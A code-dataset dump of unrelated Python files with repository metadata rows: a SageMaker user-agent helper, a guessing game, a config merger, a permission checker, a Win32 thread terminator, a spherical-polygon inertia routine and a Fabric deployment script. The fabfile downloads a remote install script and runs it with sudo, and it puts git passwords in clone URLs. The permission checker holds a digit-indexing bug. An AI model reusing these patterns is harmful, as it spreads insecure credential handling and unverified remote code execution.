# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Placeholder docstring"""
from __future__ import absolute_import
import platform
import sys
import pkg_resources
import boto3
import botocore
# Version of the installed sagemaker package, resolved at import time.
SDK_VERSION = pkg_resources.require("sagemaker")[0].version
# Fall back to placeholder strings when the platform cannot be resolved.
OS_NAME = platform.system() or "UnresolvedOS"
OS_VERSION = platform.release() or "UnresolvedOSVersion"
# Interpreter version as "major.minor.micro".
PYTHON_VERSION = "{}.{}.{}".format(
    sys.version_info.major, sys.version_info.minor, sys.version_info.micro
)
def determine_prefix():
    """Build the SageMaker SDK user-agent prefix string.

    On SageMaker notebook instances (detected via a marker file), the
    notebook-instance identifier is prepended to the base prefix.
    """
    prefix = (
        "AWS-SageMaker-Python-SDK/{} Python/{} {}/{} Boto3/{} Botocore/{}"
        .format(SDK_VERSION, PYTHON_VERSION, OS_NAME, OS_VERSION,
                boto3.__version__, botocore.__version__)
    )
    try:
        with open("/etc/opt/ml/sagemaker-notebook-instance-version.txt") as fp:
            nbi_version = fp.read().strip()
    except IOError:
        # The marker file only exists on notebook instances; its absence
        # is expected elsewhere and is silently ignored.
        return prefix
    return "AWS-SageMaker-Notebook-Instance/{} {}".format(nbi_version, prefix)
def prepend_user_agent(client):
    """Prefix the boto client's user-agent with the SageMaker identifier.

    Args:
        client: A botocore/boto3 client; its config is modified in place.
    """
    existing = client._client_config.user_agent
    prefix = determine_prefix()
    if existing is None:
        client._client_config.user_agent = prefix
    else:
        client._client_config.user_agent = "{} {}".format(prefix, existing)
| 32.6 | 99 | 0.706033 |
from __future__ import absolute_import
import platform
import sys
import pkg_resources
import boto3
import botocore
# Version of the installed sagemaker package, resolved at import time.
SDK_VERSION = pkg_resources.require("sagemaker")[0].version
# Fall back to placeholder strings when the platform cannot be resolved.
OS_NAME = platform.system() or "UnresolvedOS"
OS_VERSION = platform.release() or "UnresolvedOSVersion"
# Interpreter version as "major.minor.micro".
PYTHON_VERSION = "{}.{}.{}".format(
    sys.version_info.major, sys.version_info.minor, sys.version_info.micro
)
def determine_prefix():
    """Build the SageMaker SDK user-agent prefix string."""
    prefix = "AWS-SageMaker-Python-SDK/{} Python/{} {}/{} Boto3/{} Botocore/{}".format(
        SDK_VERSION, PYTHON_VERSION, OS_NAME, OS_VERSION, boto3.__version__, botocore.__version__
    )
    try:
        with open("/etc/opt/ml/sagemaker-notebook-instance-version.txt") as sagemaker_nbi_file:
            # On a notebook instance, prepend its version identifier.
            prefix = "AWS-SageMaker-Notebook-Instance/{} {}".format(
                sagemaker_nbi_file.read().strip(), prefix
            )
    except IOError:
        # Marker file only exists on notebook instances; ignore its absence.
        pass
    return prefix
def prepend_user_agent(client):
    """Prefix the boto client's user-agent (modified in place) with the
    SageMaker identifier returned by determine_prefix()."""
    prefix = determine_prefix()
    if client._client_config.user_agent is None:
        client._client_config.user_agent = prefix
    else:
        client._client_config.user_agent = "{} {}".format(prefix, client._client_config.user_agent)
| true | true |
f7fa2b3d59211ad6105b40a77f692272a55b042e | 416 | py | Python | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | import random as r
g=0
for i in range(0,100):
a=r.randint(0,10)
y=int(input("Enter a number between 0 and 10 (0 inclusive): "))
if y==a:
g=g+1
print("You Guessed Right the answer was: ",a)
print("You earned a guessing gem ,Your gems are: ",g)
else:
print("You guessed wrong, the answer was: ",a)
print("Your gems count is: ",g)
import random as r
# Number-guessing game: 100 rounds; earn a "guessing gem" per correct guess.
g=0
for i in range(0,100):
    # Secret number, 0..10 inclusive (randint includes both endpoints).
    a=r.randint(0,10)
    y=int(input("Enter a number between 0 and 10 (0 inclusive): "))
    if y==a:
        g=g+1
        print("You Guessed Right the answer was: ",a)
        print("You earned a guessing gem ,Your gems are: ",g)
    else:
        print("You guessed wrong, the answer was: ",a)
        print("Your gems count is: ",g)
| true | true |
f7fa2c22df6055e8f1b0a42f510e899a632aaa49 | 2,437 | py | Python | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import os
from os_apply_config import config_exception as exc
def read_configs(config_files):
    '''Generator yields (contents, path) for each existing file in config_files.

    Falsy entries (None, "") and non-existent paths are silently skipped;
    an unreadable existing file raises ConfigException.
    '''
    candidates = (path for path in config_files if path)
    for input_path in candidates:
        if not os.path.exists(input_path):
            continue
        try:
            with open(input_path) as input_file:
                contents = input_file.read()
        except IOError as e:
            raise exc.ConfigException('Could not open %s for reading. %s' %
                                      (input_path, e))
        yield (contents, input_path)
def parse_configs(config_data):
    '''Generator yields parsed JSON for each (data, path) pair in config_data.

    Raises ConfigException when a file's contents are not valid JSON.
    '''
    for input_data, input_path in config_data:
        try:
            parsed = json.loads(input_data)
        except ValueError:
            raise exc.ConfigException('Could not parse metadata file: %s' %
                                      input_path)
        yield parsed
def _deep_merge_dict(a, b):
    '''Return a deep merge of dicts a and b; values from b win on conflict.'''
    # A non-dict value in b simply replaces whatever a had.
    if not isinstance(b, dict):
        return b
    merged = copy.deepcopy(a)
    for key, value in b.items():
        if key in merged and isinstance(merged[key], dict):
            # Recurse so nested dicts are merged rather than replaced.
            merged[key] = _deep_merge_dict(merged[key], value)
        else:
            merged[key] = copy.deepcopy(value)
    return merged
def merge_configs(parsed_configs):
    '''Returns deep-merged dict from passed list of dicts.'''
    final_conf = {}
    # Falsy entries ({} or None) contribute nothing and are skipped.
    for conf in (c for c in parsed_configs if c):
        final_conf = _deep_merge_dict(final_conf, conf)
    return final_conf
def collect_config(os_config_files, fallback_paths=None):
    '''Convenience method to read, parse, and merge all paths.

    Fallback paths, when given, are read first so the main config files
    override them in the merge.
    '''
    paths = fallback_paths + os_config_files if fallback_paths else os_config_files
    return merge_configs(parse_configs(read_configs(paths)))
| 34.323944 | 79 | 0.663931 |
import copy
import json
import os
from os_apply_config import config_exception as exc
def read_configs(config_files):
    """Yield (contents, path) for each existing file; skip falsy entries."""
    for input_path in [x for x in config_files if x]:
        if os.path.exists(input_path):
            try:
                with open(input_path) as input_file:
                    yield((input_file.read(), input_path))
            except IOError as e:
                # Existing but unreadable files are a hard error.
                raise exc.ConfigException('Could not open %s for reading. %s' %
                                          (input_path, e))
def parse_configs(config_data):
    """Yield parsed JSON for each (data, path) pair in config_data."""
    for input_data, input_path in config_data:
        try:
            yield(json.loads(input_data))
        except ValueError:
            raise exc.ConfigException('Could not parse metadata file: %s' %
                                      input_path)
def _deep_merge_dict(a, b):
    """Deep-merge dicts a and b; values from b win on conflict."""
    # A non-dict value in b simply replaces whatever a had.
    if not isinstance(b, dict):
        return b
    new_dict = copy.deepcopy(a)
    for k, v in iter(b.items()):
        if k in new_dict and isinstance(new_dict[k], dict):
            # Recurse so nested dicts merge instead of being replaced.
            new_dict[k] = _deep_merge_dict(new_dict[k], v)
        else:
            new_dict[k] = copy.deepcopy(v)
    return new_dict
def merge_configs(parsed_configs):
    """Return the deep merge of all truthy dicts in parsed_configs."""
    final_conf = {}
    for conf in parsed_configs:
        if conf:
            final_conf = _deep_merge_dict(final_conf, conf)
    return final_conf
def collect_config(os_config_files, fallback_paths=None):
    """Read, parse and merge all paths; fallbacks are read (and merged) first."""
    if fallback_paths:
        os_config_files = fallback_paths + os_config_files
    return merge_configs(parse_configs(read_configs(os_config_files)))
| true | true |
f7fa2cc9fba52e7116ca3beec7518e45bd0501d7 | 423 | py | Python | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | import os
from permission_check.utils import Permission
class PermissionCheck:
def __init__(self, path):
self.path = path
self.stat = os.stat(self.path)
self.permissions = oct(self.stat.st_mode)[-3:]
self.owner = Permission(permission=self.permissions[0])
self.group = Permission(permission=self.permissions[0])
self.others = Permission(permission=self.permissions[0])
| 32.538462 | 64 | 0.690307 | import os
from permission_check.utils import Permission
class PermissionCheck:
def __init__(self, path):
self.path = path
self.stat = os.stat(self.path)
self.permissions = oct(self.stat.st_mode)[-3:]
self.owner = Permission(permission=self.permissions[0])
self.group = Permission(permission=self.permissions[0])
self.others = Permission(permission=self.permissions[0])
| true | true |
f7fa2d932f3bc20229b405dcc2c1eeedca11932a | 3,312 | py | Python | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | '''
Created on 2017/05/11
Licensed under MIT
@author: sakurai
'''
from contextlib import contextmanager
from ctypes import c_int
from ctypes import POINTER
from ctypes import windll
from ctypes import WinError
from ctypes import wintypes
from threading import _active
from threading import _active_limbo_lock
from threading import Lock
from threading import Thread
import warnings
__all__ = ["ThreadTerminationWarning", "TerminatableThread"]
def assertNotNULL(result, func, args):
    """ctypes errcheck hook: raise WinError when the call returned NULL."""
    if result != POINTER(c_int)():
        return args
    raise WinError()
def assertTrue(result, func, args):
    """ctypes errcheck callback: raise WinError() when the Win32 call returned
    a zero/falsy result (the Win32 failure convention for BOOL returns)."""
    if not result:
        raise WinError()
    return args
# https://msdn.microsoft.com/en-US/library/windows/apps/ms684335.aspx
OpenThread = windll.kernel32.OpenThread
OpenThread.restype = wintypes.HANDLE
OpenThread.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
OpenThread.errcheck = assertNotNULL
OpenThread.__doc__ = """\
HANDLE OpenThread(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwThreadId
);
"""
# https://msdn.microsoft.com/en-US/library/windows/desktop/ms686717.aspx
TerminateThread = windll.kernel32.TerminateThread
TerminateThread.restype = wintypes.BOOL
TerminateThread.argtypes = (wintypes.HANDLE, wintypes.DWORD)
TerminateThread.errcheck = assertTrue
TerminateThread.__doc__ = """\
BOOL WINAPI TerminateThread(
_Inout_ HANDLE hThread,
_In_ DWORD dwExitCode
);
"""
# https://msdn.microsoft.com/en-US/library/windows/desktop/ms724211.aspx
CloseHandle = windll.kernel32.CloseHandle
CloseHandle.restype = wintypes.BOOL
CloseHandle.argtypes = (wintypes.HANDLE, )
CloseHandle.errcheck = assertTrue
CloseHandle.__doc__ = """\
BOOL WINAPI CloseHandle(
_In_ HANDLE hObject
);
"""
# https://msdn.microsoft.com/en-us/library/windows/apps/ms686769.aspx
THREAD_TERMINATE = 0x0001
@contextmanager
def closing(handle):
    """Context manager that yields *handle* and releases it via CloseHandle.

    Fix: the handle is now closed in a ``finally`` clause, so it is no longer
    leaked when the ``with`` body raises an exception (the original only
    closed it on normal exit).
    """
    try:
        yield handle
    finally:
        CloseHandle(handle)
class ThreadTerminationWarning(RuntimeWarning):
    """Warns that a thread is being forcibly killed via Win32 TerminateThread,
    which can leave locks held and objects uncollectable."""
    pass
class TerminatableThread(Thread):
    """threading.Thread subclass that can be forcibly killed through the Win32
    TerminateThread API.

    NOTE: this relies on CPython ``threading`` internals (_active,
    _active_limbo_lock, per-version stop attributes) and is Windows-only.
    """
    # Serializes concurrent terminate() calls across all instances.
    __termination_lock = Lock()
    def terminate(self, exit_code=1):
        """Terminate thread using Win32 API with freeing *less* resources"""
        with self.__termination_lock:
            warnings.warn(
                "Be aware that thread (ident=%s, name=%s) is being terminated "
                "by non-standard way, it would cause various problems such as "
                "generating uncollectable objects bounded to the thread and "
                "so on." % (self.ident, self.name),
                category=ThreadTerminationWarning, stacklevel=2)
            # Terminating native thread by Win32 API.
            with closing(OpenThread(THREAD_TERMINATE, False, self.ident)) as h:
                TerminateThread(h, exit_code)
            with _active_limbo_lock:
                # Updating table recording all active threads.
                del _active[self.ident]
            # Masquerading as stopped (Ordered from modern to ancient ways)
            # so that join()/is_alive() behave as if the thread exited.
            if hasattr(self, "_is_stopped"): # Py3.6
                self._is_stopped = True
                self._tstate_lock.release()
            elif hasattr(self, "_stop"): # Py3.3
                self._stop()
            elif hasattr(self, "_Thread__stop"): # Py2.7
                self._Thread__stop()
| 28.8 | 79 | 0.692633 |
from contextlib import contextmanager
from ctypes import c_int
from ctypes import POINTER
from ctypes import windll
from ctypes import WinError
from ctypes import wintypes
from threading import _active
from threading import _active_limbo_lock
from threading import Lock
from threading import Thread
import warnings
__all__ = ["ThreadTerminationWarning", "TerminatableThread"]
def assertNotNULL(result, func, args):
if result == POINTER(c_int)():
raise WinError()
return args
def assertTrue(result, func, args):
if not result:
raise WinError()
return args
OpenThread = windll.kernel32.OpenThread
OpenThread.restype = wintypes.HANDLE
OpenThread.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
OpenThread.errcheck = assertNotNULL
OpenThread.__doc__ = """\
HANDLE OpenThread(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwThreadId
);
"""
TerminateThread = windll.kernel32.TerminateThread
TerminateThread.restype = wintypes.BOOL
TerminateThread.argtypes = (wintypes.HANDLE, wintypes.DWORD)
TerminateThread.errcheck = assertTrue
TerminateThread.__doc__ = """\
BOOL WINAPI TerminateThread(
_Inout_ HANDLE hThread,
_In_ DWORD dwExitCode
);
"""
CloseHandle = windll.kernel32.CloseHandle
CloseHandle.restype = wintypes.BOOL
CloseHandle.argtypes = (wintypes.HANDLE, )
CloseHandle.errcheck = assertTrue
CloseHandle.__doc__ = """\
BOOL WINAPI CloseHandle(
_In_ HANDLE hObject
);
"""
THREAD_TERMINATE = 0x0001
@contextmanager
def closing(handle):
yield handle
CloseHandle(handle)
class ThreadTerminationWarning(RuntimeWarning):
pass
class TerminatableThread(Thread):
__termination_lock = Lock()
def terminate(self, exit_code=1):
with self.__termination_lock:
warnings.warn(
"Be aware that thread (ident=%s, name=%s) is being terminated "
"by non-standard way, it would cause various problems such as "
"generating uncollectable objects bounded to the thread and "
"so on." % (self.ident, self.name),
category=ThreadTerminationWarning, stacklevel=2)
with closing(OpenThread(THREAD_TERMINATE, False, self.ident)) as h:
TerminateThread(h, exit_code)
with _active_limbo_lock:
del _active[self.ident]
if hasattr(self, "_is_stopped"):
self._is_stopped = True
self._tstate_lock.release()
elif hasattr(self, "_stop"):
self._stop()
elif hasattr(self, "_Thread__stop"):
self._Thread__stop()
| true | true |
f7fa2f2fef8dbc0635ae065be6232efbdbf90d67 | 3,152 | py | Python | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | 2 | 2020-01-10T14:21:53.000Z | 2022-01-11T10:29:24.000Z | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | null | null | null | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | 1 | 2021-11-15T13:10:57.000Z | 2021-11-15T13:10:57.000Z | import numpy as np
from scipy.integrate import dblquad
from .excess_area import polygon_excess
from .functions import *
def polygon_inertia(vertices):
    '''
    Calculate the geometrical inertia tensor of a spherical polygon over a unit sphere.
    Usage:
    inertia = polygon_inertia(vertices)
    Inputs:
    vertices -> [float 2d array] Vertices of the spherical polygon in form of [[lat_0,lon_0],..,[lat_n,lon_n]] with unit of degrees.
    Vertices can be arranged either counterclockwise or clockwise.
    Outputs:
    inertia -> [float array with 6 elements] geometrical inertia tensor; it is symmetrical and has six independent components.
    Note: The spherical polygon has a latitude range of [-90°,90°] and a longitude range of [-180°,180°] or [0°,360°].
    '''
    N = len(vertices)
    # Initialize the 6 components of the geometrical inertia tensor
    sum11,sum22,sum33,sum12,sum13,sum23 = np.zeros(6)
    for i in range(N - 1):
        p1 = np.radians(vertices[i])
        p2 = np.radians(vertices[i+1])
        pdlon = p2[1]-p1[1]
        # Unwrap the longitude difference so each edge takes the short way
        # around the date line.
        if pdlon < -np.pi: p2[1] = p2[1] + 2*np.pi
        if pdlon > np.pi: p2[1] = p2[1] - 2*np.pi
        # If two adjacent vertices are close enough(coincident), do nothing.
        if np.abs(pdlon) < 1e-6: continue
        # NOTE(review): c1,c2,c3 are never used below — presumably
        # integrate_coeffs sets module-level state consumed by f11..f23 and
        # fs_low/fs_up in .functions; confirm before removing this call.
        c1,c2,c3= integrate_coeffs(p1,p2)
        # Calculate the geometrical inertia tensor
        # (double integrals of each component over the edge's longitude span).
        s11 = dblquad(f11, p1[1], p2[1], fs_low,fs_up)
        s22 = dblquad(f22, p1[1], p2[1], fs_low,fs_up)
        s33 = dblquad(f33, p1[1], p2[1], fs_low,fs_up)
        s12 = dblquad(f12, p1[1], p2[1], fs_low,fs_up)
        s13 = dblquad(f13, p1[1], p2[1], fs_low,fs_up)
        s23 = dblquad(f23, p1[1], p2[1], fs_low,fs_up)
        # dblquad returns (value, abserr); accumulate the values only.
        sum11 += s11[0]
        sum22 += s22[0]
        sum33 += s33[0]
        sum12 += s12[0]
        sum13 += s13[0]
        sum23 += s23[0]
    # Signed spherical excess distinguishes vertex orientation and whether the
    # polygon covers more or less than a hemisphere.
    # NOTE(review): if excess is exactly 0 none of the four branches below
    # runs and the return statement raises NameError — confirm whether that
    # case can occur for valid input.
    excess = polygon_excess(vertices)
    # For counterclockwise arrangement
    if excess > 0 and excess < 2*np.pi:
        inertia11 = excess - sum11
        inertia22 = excess - sum22
        inertia33 = excess - sum33
        inertia12 = -sum12
        inertia13 = -sum13
        inertia23 = -sum23
    if excess >= 2*np.pi:
        # Polygon covers more than a hemisphere: complement against the
        # full-sphere inertia 8*pi/3.
        inertia11 = 8/3*np.pi - (excess - sum11)
        inertia22 = 8/3*np.pi - (excess - sum22)
        inertia33 = 8/3*np.pi - (excess - sum33)
        inertia12 = sum12
        inertia13 = sum13
        inertia23 = sum23
    # For clockwise arrangement
    if excess < 0 and excess > -2*np.pi:
        inertia11 = -excess + sum11
        inertia22 = -excess + sum22
        inertia33 = -excess + sum33
        inertia12 = sum12
        inertia13 = sum13
        inertia23 = sum23
    if excess <= -2*np.pi:
        inertia11 = 8/3*np.pi - (-excess + sum11)
        inertia22 = 8/3*np.pi - (-excess + sum22)
        inertia33 = 8/3*np.pi - (-excess + sum33)
        inertia12 = -sum12
        inertia13 = -sum13
        inertia23 = -sum23
    return np.array([inertia11,inertia22,inertia33,inertia12,inertia13,inertia23])
from scipy.integrate import dblquad
from .excess_area import polygon_excess
from .functions import *
def polygon_inertia(vertices):
N = len(vertices)
sum11,sum22,sum33,sum12,sum13,sum23 = np.zeros(6)
for i in range(N - 1):
p1 = np.radians(vertices[i])
p2 = np.radians(vertices[i+1])
pdlon = p2[1]-p1[1]
if pdlon < -np.pi: p2[1] = p2[1] + 2*np.pi
if pdlon > np.pi: p2[1] = p2[1] - 2*np.pi
if np.abs(pdlon) < 1e-6: continue
c1,c2,c3= integrate_coeffs(p1,p2)
s11 = dblquad(f11, p1[1], p2[1], fs_low,fs_up)
s22 = dblquad(f22, p1[1], p2[1], fs_low,fs_up)
s33 = dblquad(f33, p1[1], p2[1], fs_low,fs_up)
s12 = dblquad(f12, p1[1], p2[1], fs_low,fs_up)
s13 = dblquad(f13, p1[1], p2[1], fs_low,fs_up)
s23 = dblquad(f23, p1[1], p2[1], fs_low,fs_up)
sum11 += s11[0]
sum22 += s22[0]
sum33 += s33[0]
sum12 += s12[0]
sum13 += s13[0]
sum23 += s23[0]
excess = polygon_excess(vertices)
if excess > 0 and excess < 2*np.pi:
inertia11 = excess - sum11
inertia22 = excess - sum22
inertia33 = excess - sum33
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
if excess >= 2*np.pi:
inertia11 = 8/3*np.pi - (excess - sum11)
inertia22 = 8/3*np.pi - (excess - sum22)
inertia33 = 8/3*np.pi - (excess - sum33)
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
if excess < 0 and excess > -2*np.pi:
inertia11 = -excess + sum11
inertia22 = -excess + sum22
inertia33 = -excess + sum33
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
if excess <= -2*np.pi:
inertia11 = 8/3*np.pi - (-excess + sum11)
inertia22 = 8/3*np.pi - (-excess + sum22)
inertia33 = 8/3*np.pi - (-excess + sum33)
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
return np.array([inertia11,inertia22,inertia33,inertia12,inertia13,inertia23]) | true | true |
f7fa2fe16e5e15e747920ac84b9b7e96c7c7b8a2 | 8,096 | py | Python | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | from getpass import getpass
from fabric import Config, Connection, task
from invoke import Responder
from invoke import run as run_local
REPOSITORY_URL = "github.com/janbrrr/django-polls-improved.git" # without the https://
HOSTS = {
"local": {"address": "localhost"},
"prod": {"address": "YOUR-HOST", "project_dir": "~/python/django-polls-improved"},
}
DOCKER_RUN_CMD = "docker-compose up -d --build"
DOCKER_STOP_CMD = "docker-compose down"
DOCKER_STATUS_CMD = "docker-compose ps"
DOCKER_LOGS_CMD = "docker-compose logs"
@task
def setup(context):
    """Provision the remote 'prod' host: clone the repo, build Python, install
    Docker, and create a virtualenv containing docker-compose."""
    host = context.host
    if host not in HOSTS or host == "local":
        raise RuntimeError("Run 'fab -H <host> setup' where <host> is 'prod'")
    remote_user = input("User: ")
    remote_password = getpass("Password: ")
    # sudo password is fed to fabric so install steps can elevate.
    config = Config(overrides={"sudo": {"password": remote_password}})
    remote_address = HOSTS[host]["address"]
    remote_project_dir = HOSTS[host]["project_dir"]
    with Connection(
        host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}, config=config
    ) as connection:
        git_clone(connection, remote_project_dir)
        install_python(connection, remote_password)
        install_docker(connection)
        # Install docker-compose in a virtual environment
        create_venv(connection, remote_project_dir)
        run_in_venv(connection, remote_project_dir, "pip install wheel") # Required for building
        run_in_venv(connection, remote_project_dir, "pip install docker-compose")
    print()
    print("Setup complete!")
    print("Remember to put your certificate in 'nginx/my_cert.pem' and your key in 'nginx/my_key.pem'")
    print("or run 'fab -H prod create-certificate' to create a self-signed certificate")
    print("Remember to create the '.env' and 'env.db' files to configure the Django and Postgres.")
@task
def create_certificate(context):
    """Generate a self-signed TLS key/cert pair under nginx/ (valid 365 days),
    either locally or on the remote host."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> create-certificate' where <host> is 'local' or 'prod'")
    command = "openssl req -x509 -newkey rsa:4096 -keyout nginx/my_key.pem -out nginx/my_cert.pem -days 365 --nodes"
    if host == "local":
        run_local(command)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            with connection.cd(remote_project_dir):
                connection.run(command)
@task
def create_superuser(context):
    """Run Django's interactive `createsuperuser` inside the running 'web'
    container (pty=True keeps the remote prompts interactive)."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> create-superuser' where <host> is 'local' or 'prod'")
    command = "docker-compose exec web python manage.py createsuperuser"
    if host == "local":
        run_local(command)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            run_in_venv(connection, remote_project_dir, command, pty=True)
@task
def deploy(context):
    """Build and (re)start the docker-compose stack; on the remote host the
    latest code is pulled first."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> deploy' where <host> is 'local' or 'prod'")
    if host == "local":
        run_local(DOCKER_RUN_CMD)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            git_pull(connection, remote_project_dir)
            run_in_venv(connection, remote_project_dir, DOCKER_RUN_CMD)
@task
def stop(context):
    """Stop and remove the docker-compose stack on the chosen host."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> stop' where <host> is 'local' or 'prod'")
    if host == "local":
        run_local(DOCKER_STOP_CMD)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            run_in_venv(connection, remote_project_dir, DOCKER_STOP_CMD)
@task
def status(context):
    """Show `docker-compose ps` for the stack on the chosen host."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> status' where <host> is 'local' or 'prod'")
    if host == "local":
        run_local(DOCKER_STATUS_CMD)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            run_in_venv(connection, remote_project_dir, DOCKER_STATUS_CMD)
@task
def logs(context):
    """Show `docker-compose logs` for the stack on the chosen host."""
    host = context.host
    if host not in HOSTS:
        raise RuntimeError("Run 'fab -H <host> logs' where <host> is 'local' or 'prod'")
    if host == "local":
        run_local(DOCKER_LOGS_CMD)
    else:
        remote_user = input("User: ")
        remote_password = getpass("Password: ")
        remote_address = HOSTS[host]["address"]
        remote_project_dir = HOSTS[host]["project_dir"]
        with Connection(
            host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
        ) as connection:
            run_in_venv(connection, remote_project_dir, DOCKER_LOGS_CMD)
def install_docker(connection):
    """Install Docker via the get.docker.com convenience script and let the
    current remote user run docker without sudo."""
    connection.run("curl -fsSL https://get.docker.com -o get-docker.sh")
    connection.sudo("sh get-docker.sh")
    connection.sudo("usermod -a -G docker $USER")
def install_python(connection, sudo_password):
    """Build Python 3.7.3 from source on the remote host and `make altinstall`
    it (leaving the system python untouched), then clean up the sources."""
    connection.sudo("apt-get update -qy")
    # Build dependencies for a full CPython build (ssl, sqlite, lzma, ...).
    connection.sudo(
        "apt-get install -qy build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev "
        "libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev"
    )
    connection.run("wget https://www.python.org/ftp/python/3.7.3/Python-3.7.3.tar.xz")
    connection.run("tar xf Python-3.7.3.tar.xz")
    with connection.cd("Python-3.7.3"):
        connection.run("./configure")
        connection.run("make")
        # Running connection.sudo(...) will fail for the next command, so we need a workaround
        # Make sure to adjust the pattern if you are using a different language
        sudo_responder = Responder(pattern=r"\[sudo\] password", response=f"{sudo_password}\n")
        connection.run("sudo make altinstall", pty=True, watchers=[sudo_responder])
    connection.sudo("rm -r Python-3.7.3")
    connection.sudo("rm Python-3.7.3.tar.xz")
def git_clone(connection, project_dir):
    """Clone the repository into *project_dir*, prompting for git credentials.

    NOTE(review): embedding credentials in the clone URL persists them in the
    checkout's .git/config — consider a git credential helper instead.
    """
    git_username = input("Git username: ")
    git_password = getpass("Git password: ")
    connection.run(f"git clone https://{git_username}:{git_password}@{REPOSITORY_URL} {project_dir}")
def git_pull(connection, project_dir):
    """Pull the latest `master` into *project_dir*, prompting for git
    credentials (passed inline in the URL, same caveat as git_clone)."""
    with connection.cd(project_dir):
        git_username = input("Git username: ")
        git_password = getpass("Git password: ")
        connection.run(f"git pull https://{git_username}:{git_password}@{REPOSITORY_URL} master")
def create_venv(connection, project_dir):
    """Create a `venv` virtual environment inside *project_dir* using the
    python3.7 built by install_python."""
    with connection.cd(project_dir):
        connection.run("python3.7 -m venv venv")
def run_in_venv(connection, project_dir, command, **kwargs):
    """Run *command* inside *project_dir* with the project's venv activated;
